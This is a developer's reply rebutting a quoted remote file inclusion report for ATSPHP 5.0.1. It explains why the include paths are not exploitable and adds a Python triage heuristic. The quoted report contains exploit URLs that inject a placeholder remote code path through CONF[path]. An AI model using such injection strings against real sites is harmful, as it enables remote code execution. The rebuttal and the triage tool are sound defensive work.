<snip class="drivel">
> file ;
> index.php
> sources/usercp.php
> sources/admin.php
>
> ########################################################################
>
> bugs ;
>
> require_once("{$CONF['path']}/sources/misc/classes.php");
>
>
> ########################################################################
> exp;
> /atsphp-5.0.1/index.php?CONF[path]=evilcode?
> /atsphp-5.0.1/sources/usercp.php?CONF[path]=evilcode?
> /atsphp-5.0.1/sources/admin.php?CONF[path]=evilcode?
>
> ########################################################################
>
</snip>

in the index.php the $CONF['path'] variable is overwritten on line 20, with line 26 being the require_once() call:

$CONF['path'] = '.';

This same line also is applied in the following file(s):

ssi.php
captcha.php
button.php
install/index.php
install/upgrade.php

in the source/user_cp.php file (incorrectly noted as usercp.php):

since the referenced require_once is enclosed in a class it is impossible to instance this class and subsequently call the require_once() on line 29.

in the source/admin.php file:

the same applies to this file as the require_once() are encapsulated within a class that can not be instanced.

Tom Walsh
Express Web Systems, Inc.
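
Added example, not part of the original message or of ATSPHP's code: a heuristic Python triage of the two conditions the reply relies on, namely a top-level literal assignment that precedes the include and an include that sits inside a class body. The function `triage`, the class name `usercp_example` and both sample sources are constructed for illustration.

```python
import re

# Heuristic patterns, not a PHP parser: enough to triage a report by hand.
INCLUDE = re.compile(r"\b(?:require|include)(?:_once)?\b[^;$]*\$(\w+)")
ASSIGN = re.compile(r"""^\s*\$(\w+)(?:\[[^\]]*\])*\s*=\s*(['"])[^'"$]*\2\s*;""")
CLASS_OPEN = re.compile(r"^\s*class\s+\w+")

def triage(php_source):
    """Return (line, variable, verdict) for each include built from a variable."""
    findings, literal_assigned = [], set()
    depth, class_base, opened = 0, None, False
    for lineno, line in enumerate(php_source.splitlines(), 1):
        if class_base is None and CLASS_OPEN.match(line):
            class_base, opened = depth, False
        assigned = ASSIGN.match(line)
        if assigned and depth == 0:  # top-level literal replaces request input
            literal_assigned.add(assigned.group(1))
        included = INCLUDE.search(line)
        if included:
            var = included.group(1)
            if class_base is not None:
                verdict = "in-class"     # runs only if something calls the method
            elif var in literal_assigned:
                verdict = "overwritten"  # fixed value set before the include
            else:
                verdict = "review"       # nothing here rules the report out
            findings.append((lineno, var, verdict))
        depth += line.count("{") - line.count("}")
        if class_base is not None:
            opened = opened or depth > class_base
            if opened and depth <= class_base:
                class_base = None        # class body closed
    return findings

# Constructed samples modelled on the message; not the real ATSPHP files.
INDEX_LIKE = '''<?php
$CONF['path'] = '.';
require_once("{$CONF['path']}/sources/misc/classes.php");
'''
CLASS_LIKE = '''<?php
class usercp_example {
    function run() {
        require_once("{$CONF['path']}/sources/misc/classes.php");
    }
}
'''

if __name__ == "__main__":
    for name, src in (("index-like", INDEX_LIKE), ("class-like", CLASS_LIKE)):
        print(name, triage(src))
```

An `in-class` verdict still requires confirming that nothing at the file's top level instantiates the class and calls the method.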